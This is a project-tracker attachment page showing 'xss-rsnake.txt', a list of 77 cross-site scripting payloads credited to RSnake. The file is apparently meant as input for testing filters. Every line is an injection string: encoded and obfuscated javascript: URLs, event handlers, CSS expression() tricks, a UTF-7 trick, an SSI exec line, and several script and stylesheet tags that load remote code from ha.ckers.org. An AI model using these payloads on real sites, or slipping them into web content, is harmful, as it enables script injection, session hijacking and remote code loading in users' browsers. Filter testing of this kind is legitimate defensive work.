Project

General

Profile

xss-rsnake.txt

Luke Murphey, 11/30/2015 08:58 PM

Download (4.3 KB)

 
1 
# credit to rsnake
2 
<SCRIPT>alert('XSS');</SCRIPT>
3 
'';!--"<XSS>=&{()}
4 
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
5 
<IMG SRC="javascript:alert('XSS');">
6 
<IMG SRC=javascript:alert('XSS')>
7 
<IMG SRC=JaVaScRiPt:alert('XSS')>
8 
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
9 
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
10 
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
11 
SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
12 
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
13 
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
14 
<IMG SRC="jav	ascript:alert('XSS');">
15 
<IMG SRC="jav&#x09;ascript:alert('XSS');">
16 
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
17 
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
18 
<IMG SRC=" &#14;  javascript:alert('XSS');">
19 
<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a>
20 
<IMG SRC=java%00script:alert(\"XSS\")>
21 
<SCR%00IPT>alert(\"XSS\")</SCR%00IPT>
22 
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
23 
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
24 
<IMG SRC="javascript:alert('XSS')"
25 
<SCRIPT>a=/XSS/
26 
\";alert('XSS');//
27 
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
28 
<BODY BACKGROUND="javascript:alert('XSS')">
29 
<BODY ONLOAD=alert('XSS')>
30 
<IMG DYNSRC="javascript:alert('XSS')">
31 
<IMG LOWSRC="javascript:alert('XSS')">
32 
<BGSOUND SRC="javascript:alert('XSS');">
33 
<BR SIZE="&{alert('XSS')}">
34 
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
35 
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
36 
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
37 
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
38 
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
39 
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
40 
<IMG SRC='vbscript:msgbox("XSS")'>
41 
<IMG SRC="mocha:[code]">
42 
<IMG SRC="livescript:[code]">
43 
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
44 
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
45 
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
46 
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
47 
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
48 
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
49 
<TABLE BACKGROUND="javascript:alert('XSS')">
50 
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
51 
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
52 
<DIV STYLE="width: expression(alert('XSS'));">
53 
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
54 
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
55 
<XSS STYLE="xss:expression(alert('XSS'))">
56 
exp/*<XSS STYLE='no\xss:noxss("*//*");
57 
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
58 
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
59 
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
60 
<BASE HREF="javascript:alert('XSS');//">
61 
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
62 
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
63 
getURL("javascript:alert('XSS')")
64 
a="get";
65 
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
66 
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
67 
<HTML><BODY>
68 
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
69 
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
70 
<? echo('<SCR)';
71 
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
72 
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
73 
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
74 
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
75 
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
76 
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
77 
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>